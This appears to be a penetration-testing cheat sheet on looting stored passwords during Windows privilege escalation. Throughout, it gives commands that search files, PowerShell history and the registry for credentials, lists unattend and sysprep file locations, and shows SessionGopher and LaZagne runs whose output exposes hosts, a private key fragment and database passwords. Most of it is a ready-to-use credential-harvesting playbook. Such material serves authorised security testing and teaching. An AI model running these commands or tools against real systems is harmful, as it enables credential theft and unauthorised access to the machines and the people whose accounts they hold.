==============================================================================================================================
Windows local privilege escalation example - Looting for passwords
==============================================================================================================================

------------------------------------------------------------------------------------------------------------------------------
1. Manual searches
------------------------------------------------------------------------------------------------------------------------------

1. Search for passwords stored in the configuration files of Web app/servers
-----------------------------------------------------------------------------
> web.config (IIS)
> tomcat-users.xml (Tomcat)
> security.xml (Websphere)
> security-context.xml (Spring App)
> config-db.php / config.inc.php (PhpMyadmin)
> wp-config.php (Wordpress)
> ...

2. Search for passwords hardcoded in scripts (e.g. PowerShell, Batch, VBS) and in notes
----------------------------------------------------------------------------------------
> cd C:\ & findstr /SI /M "password" *.bat *.ps1 *.vbs *.txt
> findstr /si password *.bat *.ps1 *.vbs *.txt 2>nul >> results.txt
> findstr /spin "password" *.*

3. Search for passwords stored in the PowerShell history
-----------------------------------------------------------
> type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
> type C:\Users\<USRENAME>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
> type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
> cat (Get-PSReadlineOption).HistorySavePath
> cat (Get-PSReadlineOption).HistorySavePath | sls passw

4. Search the registry for key names and passwords
---------------------------------------------------
> reg query HKLM /f password /t REG_SZ /s
> reg query HKCU /f password /t REG_SZ /s
> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" 
> reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
> reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
> reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
> reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

5. Passwords in Unattend.xml
------------------------------
Location of the unattend.xml files:
> C:\unattend.xml
> C:\Windows\Panther\Unattend.xml
> C:\Windows\Panther\Unattend\Unattend.xml
> C:\Windows\system32\sysprep.inf
> C:\Windows\system32\sysprep\sysprep.xml
> Display the content of these files with dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul


------------------------------------------------------------------------------------------------------------------------------
2. SessionGopher 
------------------------------------------------------------------------------------------------------------------------------

=> https://github.com/Arvanaghi/SessionGopher

SessionGopher is a PowerShell tool that uses WMI to extract saved session information for remote access tools such as:
> WinSCP, 
> PuTTY, 
> SuperPuTTY, 
> FileZilla,
> Microsoft Remote Desktop.

It can be run remotely or locally.

Example / PoC
--------------
PS C:\Users\Administrator.Laptop1\Documents\Tools-Pentest\2-Password-Dump&Cracking> . .\Session-Gopher.ps1
PS C:\Users\Administrator.Laptop1\Documents\Tools-Pentest\2-Password-Dump&Cracking> Invoke-SessionGopher -Thorough
          o_
         /  ".   SessionGopher
       ,"  _-"
     ,"   m m
  ..+     )      Brandon Arvanaghi
     `m..m       Twitter: @arvanaghi | arvanaghi.com

[+] Digging on Laptop1 ...
Microsoft Remote Desktop (RDP) Sessions


Source   : Laptop1\Administrator
Hostname : 192.168.56.103
Username : Administrator

Source   : Laptop1\Administrator
Hostname : 192.168.7.10
Username : Laptop1\Administrator

Source   : Laptop1\Administrator
Hostname : test-sqldb
Username : Laptop1\Administrator


PuTTY Private Key Files (.ppk)

Source                 : Laptop1
Path                   : C:\Users\Administrator\Documents\Tests\pentester-test.ppk
Protocol               : ssh-rsa
Comment                : imported-openssh-key
Private Key Encryption : none
Private Key            : AAABAQC69SnfwMLS9LeBoh2UrW2dJye55<SNIP>
Private MAC            : 34ad174103a397c223416c024562f11d1<SNIP>


------------------------------------------------------------------------------------------------------------------------------
3. Lazagne
------------------------------------------------------------------------------------------------------------------------------

Note: It is just for testing purposes. I would not recommend to run it on a production server during a penetration test. It is better to perform 'manual' searches.

=> https://github.com/AlessandroZ/LaZagne

The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. 

For Windows systems, Lazagne can be usefull to retrieve saved passwords for the dba/sysadmin software listed below.

+ Database clients
  > DBVisualizer (DBvis)
  > Postgresql
  > Robomongo
  > Squirrel
  > SQLdevelopper
  
+ Sysadmin tools
  > Apache Directory Studio
  > CoreFTP
  > CyberDuck
  > FileZilla
  > FileZilla Server
  > FTPNavigator
  > OpenSSH
  > OpenVPN
  > KeePass Configuration Files (KeePass1, KeePass2)
  > PuttyCM
  > RDPManager
  > VNC
  > WinSCP
  > Windows Subsystem for Linux

Example / PoC
--------------

C:\Users\Administrator\Documents\Tools-Pentest\Lazagne> lazagne.exe databases -v

|====================================================================|
|                        The LaZagne Project                         |
|                          ! BANG BANG !                             |
|====================================================================|

[+] System masterkey decrypted for <SNIP>

########## User: SYSTEM ##########


########## User: Administrator ##########

 ------------------- Dbvis passwords -----------------
[+] Password found !!!
Name: Oracle-test
Driver:
          Oracle OCI

Host: 192.168.13.92
SID: XE
Login: sys
Password: Welcome1
Port: 1521

 ------------------- Postgresql passwords -----------------
[!] No passwords found

 ------------------- Squirrel passwords -----------------
[!] No passwords found

 ------------------- Sqldeveloper passwords -----------------
[!] No passwords found

 ------------------- Robomongo passwords -----------------
[!] No passwords found


########## User: pentester ##########

 ------------------- Dbvis passwords -----------------

[+] Password found !!!
Name: Database Connection
Driver:
          SQL Server (jTDS)

Host: 192.168.13.239
Login: sa
Password: Test123
Port: 1433

 ------------------- Postgresql passwords -----------------
[!] No passwords found

 ------------------- Squirrel passwords -----------------
[!] No passwords found

 ------------------- Sqldeveloper passwords -----------------
[!] No passwords found

 ------------------- Robomongo passwords -----------------
[!] No passwords found

[+] 2 passwords have been found.

elapsed time = 7.09699988365


C:\Users\Administrator\Documents\Tools-Pentest\Lazagne> lazagne.exe sysadmin -v

|====================================================================|
|                        The LaZagne Project                         |
|                          ! BANG BANG !                             |
|====================================================================|

[+] System masterkey decrypted for <SNIP>

########## User: SYSTEM ##########

 ------------------- Ftpnavigator passwords -----------------
[!] No passwords found

 ------------------- Unattended passwords -----------------
[!] No passwords found


########## User: Administrator ##########

 ------------------- Vnc passwords -----------------
[!] No passwords found

 ------------------- Filezillaserver passwords -----------------
[!] No passwords found

 ------------------- Puttycm passwords -----------------
[!] No passwords found

 ------------------- Opensshforwindows passwords -----------------
[!] No passwords found

 ------------------- Wsl passwords -----------------
[!] No passwords found

 ------------------- Filezilla passwords -----------------
[!] No passwords found

 ------------------- Apachedirectorystudio passwords -----------------
[!] No passwords found

 ------------------- Coreftp passwords -----------------
[!] No passwords found

 ------------------- Winscp passwords -----------------
[!] No passwords found

 ------------------- Rdpmanager passwords -----------------
[!] No passwords found

 ------------------- Cyberduck passwords -----------------
[!] No passwords found

 ------------------- Iisapppool passwords -----------------
[!] No passwords found

 ------------------- Openvpn passwords -----------------
[!] No passwords found

 ------------------- Iiscentralcertp passwords -----------------
[!] No passwords found

<SNIP>
